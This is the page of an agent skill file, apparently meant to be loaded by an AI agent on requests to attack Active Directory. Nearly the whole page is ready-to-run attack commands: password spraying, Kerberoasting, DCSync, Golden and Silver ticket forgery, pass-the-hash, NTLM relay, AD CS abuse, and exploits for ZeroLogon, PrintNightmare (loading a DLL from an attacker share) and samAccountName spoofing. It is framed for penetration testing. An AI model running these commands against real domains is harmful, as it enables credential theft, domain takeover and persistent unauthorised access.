Open Skills Logo
Open Skills

Active Directory Attacks

此技能适用于用户询问"攻击活动目录"、"利用AD"、"Kerberoasting"、"DCSync"、"哈希传递"、"BloodHound枚举"、"黄金票据"、"白银票据"、"AS-REP烘烤"、"NTLM中继",或需要Windows域渗透测试指导的情况。

查看详情
name:Active Directory Attacksdescription:This skill should be used when the user asks to "attack Active Directory", "exploit AD", "Kerberoasting", "DCSync", "pass-the-hash", "BloodHound enumeration", "Golden Ticket", "Silver Ticket", "AS-REP roasting", "NTLM relay", or needs guidance on Windows domain penetration testing.metadata:author:zebbernversion:"1.1"

Active Directory Attacks

Purpose

Provide comprehensive techniques for attacking Microsoft Active Directory environments. Covers reconnaissance, credential harvesting, Kerberos attacks, lateral movement, privilege escalation, and domain dominance for red team operations and penetration testing.

Inputs/Prerequisites

  • Kali Linux or Windows attack platform

  • Domain user credentials (for most attacks)

  • Network access to Domain Controller

  • Tools: Impacket, Mimikatz, BloodHound, Rubeus, CrackMapExec

    • Outputs/Deliverables

  • Domain enumeration data

  • Extracted credentials and hashes

  • Kerberos tickets for impersonation

  • Domain Administrator access

  • Persistent access mechanisms

    • Essential Tools

    ToolPurpose
    BloodHoundAD attack path visualization
    ImpacketPython AD attack tools
    MimikatzCredential extraction
    RubeusKerberos attacks
    CrackMapExecNetwork exploitation
    PowerViewAD enumeration
    ResponderLLMNR/NBT-NS poisoning

    Core Workflow

    Step 1: Kerberos Clock Sync

    Kerberos requires clock synchronization (±5 minutes):

    # Detect clock skew
    nmap -sT 10.10.10.10 -p445 --script smb2-time
    Fix clock on Linux

    sudo date -s "14 APR 2024 18:25:16"
    Fix clock on Windows

    net time /domain /set
    Fake clock without changing system time

    faketime -f '+8h' <command>

    Step 2: AD Reconnaissance with BloodHound

    # Start BloodHound
    neo4j console
    bloodhound --no-sandbox
    Collect data with SharpHound

    .\SharpHound.exe -c All
    .\SharpHound.exe -c All --ldapusername user --ldappassword pass
    Python collector (from Linux)

    bloodhound-python -u 'user' -p 'password' -d domain.local -ns 10.10.10.10 -c all

    Step 3: PowerView Enumeration

    # Get domain info
    Get-NetDomain
    Get-DomainSID
    Get-NetDomainController
    Enumerate users

    Get-NetUser
    Get-NetUser -SamAccountName targetuser
    Get-UserProperty -Properties pwdlastset
    Enumerate groups

    Get-NetGroupMember -GroupName "Domain Admins"
    Get-DomainGroup -Identity "Domain Admins" | Select-Object -ExpandProperty Member
    Find local admin access

    Find-LocalAdminAccess -Verbose
    User hunting

    Invoke-UserHunter
    Invoke-UserHunter -Stealth

    Credential Attacks

    Password Spraying

    # Using kerbrute
    ./kerbrute passwordspray -d domain.local --dc 10.10.10.10 users.txt Password123
    Using CrackMapExec

    crackmapexec smb 10.10.10.10 -u users.txt -p 'Password123' --continue-on-success

    Kerberoasting

    Extract service account TGS tickets and crack offline:

    # Impacket
    GetUserSPNs.py domain.local/user:password -dc-ip 10.10.10.10 -request -outputfile hashes.txt
    Rubeus

    .\Rubeus.exe kerberoast /outfile:hashes.txt
    CrackMapExec

    crackmapexec ldap 10.10.10.10 -u user -p password --kerberoast output.txt
    Crack with hashcat

    hashcat -m 13100 hashes.txt rockyou.txt

    AS-REP Roasting

    Target accounts with "Do not require Kerberos preauthentication":

    # Impacket
    GetNPUsers.py domain.local/ -usersfile users.txt -dc-ip 10.10.10.10 -format hashcat
    Rubeus

    .\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
    Crack with hashcat

    hashcat -m 18200 hashes.txt rockyou.txt

    DCSync Attack

    Extract credentials directly from DC (requires Replicating Directory Changes rights):

    # Impacket
    secretsdump.py domain.local/admin:password@10.10.10.10 -just-dc-user krbtgt
    Mimikatz

    lsadump::dcsync /domain:domain.local /user:krbtgt
    lsadump::dcsync /domain:domain.local /user:Administrator

    Kerberos Ticket Attacks

    Pass-the-Ticket (Golden Ticket)

    Forge TGT with krbtgt hash for any user:

    # Get krbtgt hash via DCSync first
    Mimikatz - Create Golden Ticket

    kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /krbtgt:HASH /id:500 /ptt
    Impacket

    ticketer.py -nthash KRBTGT_HASH -domain-sid S-1-5-21-xxx -domain domain.local Administrator
    export KRB5CCNAME=Administrator.ccache
    psexec.py -k -no-pass domain.local/Administrator@dc.domain.local

    Silver Ticket

    Forge TGS for specific service:

    # Mimikatz
    kerberos::golden /user:Administrator /domain:domain.local /sid:S-1-5-21-xxx /target:server.domain.local /service:cifs /rc4:SERVICE_HASH /ptt

    Pass-the-Hash

    # Impacket
    psexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
    wmiexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
    smbexec.py domain.local/Administrator@10.10.10.10 -hashes :NTHASH
    CrackMapExec

    crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH -d domain.local
    crackmapexec smb 10.10.10.10 -u Administrator -H NTHASH --local-auth

    OverPass-the-Hash

    Convert NTLM hash to Kerberos ticket:

    # Impacket
    getTGT.py domain.local/user -hashes :NTHASH
    export KRB5CCNAME=user.ccache
    Rubeus

    .\Rubeus.exe asktgt /user:user /rc4:NTHASH /ptt

    NTLM Relay Attacks

    Responder + ntlmrelayx

    # Start Responder (disable SMB/HTTP for relay)
    responder -I eth0 -wrf
    Start relay

    ntlmrelayx.py -tf targets.txt -smb2support
    LDAP relay for delegation attack

    ntlmrelayx.py -t ldaps://dc.domain.local -wh attacker-wpad --delegate-access

    SMB Signing Check

    crackmapexec smb 10.10.10.0/24 --gen-relay-list targets.txt

    Certificate Services Attacks (AD CS)

    ESC1 - Misconfigured Templates

    # Find vulnerable templates
    certipy find -u user@domain.local -p password -dc-ip 10.10.10.10
    Exploit ESC1

    certipy req -u user@domain.local -p password -ca CA-NAME -target dc.domain.local -template VulnTemplate -upn administrator@domain.local
    Authenticate with certificate

    certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

    ESC8 - Web Enrollment Relay

    ntlmrelayx.py -t http://ca.domain.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

    Critical CVEs

    ZeroLogon (CVE-2020-1472)

    # Check vulnerability
    crackmapexec smb 10.10.10.10 -u '' -p '' -M zerologon
    Exploit

    python3 cve-2020-1472-exploit.py DC01 10.10.10.10
    Extract hashes

    secretsdump.py -just-dc domain.local/DC01\$@10.10.10.10 -no-pass
    Restore password (important!)

    python3 restorepassword.py domain.local/DC01@DC01 -target-ip 10.10.10.10 -hexpass HEXPASSWORD

    PrintNightmare (CVE-2021-1675)

    # Check for vulnerability
    rpcdump.py @10.10.10.10 | grep 'MS-RPRN'
    Exploit (requires hosting malicious DLL)

    python3 CVE-2021-1675.py domain.local/user:pass@10.10.10.10 '\\attacker\share\evil.dll'

    samAccountName Spoofing (CVE-2021-42278/42287)

    # Automated exploitation
    python3 sam_the_admin.py "domain.local/user:password" -dc-ip 10.10.10.10 -shell

    Quick Reference

    AttackToolCommand
    KerberoastImpacketGetUserSPNs.py domain/user:pass -request
    AS-REP RoastImpacketGetNPUsers.py domain/ -usersfile users.txt
    DCSyncsecretsdumpsecretsdump.py domain/admin:pass@DC
    Pass-the-Hashpsexecpsexec.py domain/user@target -hashes :HASH
    Golden TicketMimikatzkerberos::golden /user:Admin /krbtgt:HASH
    Spraykerbrutekerbrute passwordspray -d domain users.txt Pass

    Constraints

    Must:

  • Synchronize time with DC before Kerberos attacks

  • Have valid domain credentials for most attacks

  • Document all compromised accounts

    • Must Not:

  • Lock out accounts with excessive password spraying

  • Modify production AD objects without approval

  • Leave Golden Tickets without documentation

    • Should:

  • Run BloodHound for attack path discovery

  • Check for SMB signing before relay attacks

  • Verify patch levels for CVE exploitation

    • Examples

    Example 1: Domain Compromise via Kerberoasting

    # 1. Find service accounts with SPNs
    GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10
    2. Request TGS tickets

    GetUserSPNs.py domain.local/lowpriv:password -dc-ip 10.10.10.10 -request -outputfile tgs.txt
    3. Crack tickets

    hashcat -m 13100 tgs.txt rockyou.txt
    4. Use cracked service account

    psexec.py domain.local/svc_admin:CrackedPassword@10.10.10.10

    Example 2: NTLM Relay to LDAP

    # 1. Start relay targeting LDAP
    ntlmrelayx.py -t ldaps://dc.domain.local --delegate-access
    2. Trigger authentication (e.g., via PrinterBug)

    python3 printerbug.py domain.local/user:pass@target 10.10.10.12
    3. Use created machine account for RBCD attack

    Troubleshooting

    IssueSolution
    Clock skew too greatSync time with DC or use faketime
    Kerberoasting returns emptyNo service accounts with SPNs
    DCSync access deniedNeed Replicating Directory Changes rights
    NTLM relay failsCheck SMB signing, try LDAP target
    BloodHound emptyVerify collector ran with correct creds

    Additional Resources

    For advanced techniques including delegation attacks, GPO abuse, RODC attacks, SCCM/WSUS deployment, ADCS exploitation, trust relationships, and Linux AD integration, see references/advanced-attacks.md.

      Active Directory Attacks - Agent Skills